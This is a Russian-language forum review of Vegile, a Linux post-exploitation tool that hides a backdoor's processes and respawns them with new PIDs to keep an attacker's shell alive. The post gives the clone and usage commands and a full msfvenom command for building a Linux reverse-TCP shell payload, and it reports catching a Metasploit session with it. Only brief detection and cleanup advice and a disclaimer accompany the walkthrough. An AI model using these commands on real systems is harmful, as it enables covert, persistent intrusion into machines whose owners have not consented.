![]() |
Добрый день,Уважаемые Друзья ,Форумчане и Гости,кому небезразличен пульс ИБ.
Сегодня буду вас немного огорчать своим обзором (а там не знаю,может кого и радовать) Когда свои работы дарят миру такие авторы,то сомневаться в их компетенции не приходится. Далёкий привет из Индонезии. Встречаем ,очень хитрый и коварный инструмент - Vegile. Автором его является,не нуждающийся в представлении-Redho Maland. Да,тот самый,который входит в число 12-ти разработчиков дистрибутива для пентеста-Dracos Linux Также ,многие его знают по авторству инструментов TheFatRat,LALIN,Brutal.. Vegile изначально задуман для атаки ОС Linux,закрепления в системе. Это для файлов backdoor, с возможностью управления и постэксплуатации. Целью его может стать любая платформа Linux (base32 , base64 - без разницы) В основную задачу Vegile входит обеспечение поддержки уровня доступа к целевой системе. В дальнейшем,это позволит работать на более глубокое вторжение в сеть. Думал сделать этот обзор для Grey Section,но вспомнив,какая обширная аудитория у античат , решил,что как можно больше Линуксоидов должны знать и принять меры безопасности при встрече с таким оружием. Коварство Vegile выглядит по-своему шикарно :наведённый на попавший на целевую ОС backdoor или rootkit, он как клещ цепляется и начинает скрывать процесс,ожидая когда атакующий вызовет shell. При обнаружении (а это сделать не так-то просто),он показывает,что таких процессов нет. Но при этом, далёко не всё в порядке с целевой ОС.При простой команде # ps -aux, можно снова наблюдать его живее всех живых,а при попытке убить процесс,Vegile усыпляет бдительность, хотя на самом деле,присваивает новый PID и тут же порождает кучу других процессов. На атакующей машине можно не волноваться за потерю сессии,т.к. лёгким движением повтора команды exploit, охотник может наблюдать сразу несколько сессий с доступами shell. Как скачать: Код: Код:
# git clone https://github.com/Screetsec/Vegile.gitв рамках ознакомления и изучения проблем информационной безопасности. Категорически запрещено использование инструмента в незаконных целях. Опций,как можно видеть ,немного: Указание файла ,с которым работать,с функцией возобновления И использование опции,обеспечивающей скрытие процессов. Код: Код:
$ sudo ./Vegile --u файл_backdoorКод: Код:
msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=свой IP LPORT=номер_порта -b "\x00" -f elf -o файл_BACKDOORЯ использовал порт 8080 как и автор в своём примере. Сессия прилетела сразу,как только включился в работу Vegile,хотя Metasploit не показал ,что exploit сработал сначала. Как уберечь себя от такой атаки? Тяжело.При разнообразии backdoor,одному атакующему известно,какое название имеет процесс. При включении в управление вредоносным файлом Vegile,процесс носит имя screetsec (по нику автора). Но это если по дефолту.Убить процесс,как можно убедиться,мало,да это и не позволяет получить желаемый результат. Содержать системы в чистоте,регулярно проверять на руткиты и вредоносы.Вот,при обнаружении таких процессов, мало удалить такие файлы. Мне удалось избавиться только при полном удалении и перезагрузке системы. До этого,процессам всё же были присвоены PID,не смотря на ликвидацию. А, на текущее время,у меня всё.Для вас мне помогли сделать этот обзор дистрибутивы Kali Linux и Bugtraq2 Black Widow (Чёрная Вдова). Всем спасибо за внимание и до новых встреч на нашем Форуме.Видео от автора прилагаю. |
Цитата:
В том -то и дело,что замысел в развитии атаки.Vegile помогает закрепиться намертво backdoor в системе,помогает в маскировке,в обмане защитных систем ОС Linux. Он как бы продуман как вектор продолжения атаки. |
Цитата:
Хорошо,что внесли поправку,т.к. многие могли не воспринять сказанное. |
| Время: 21:34 |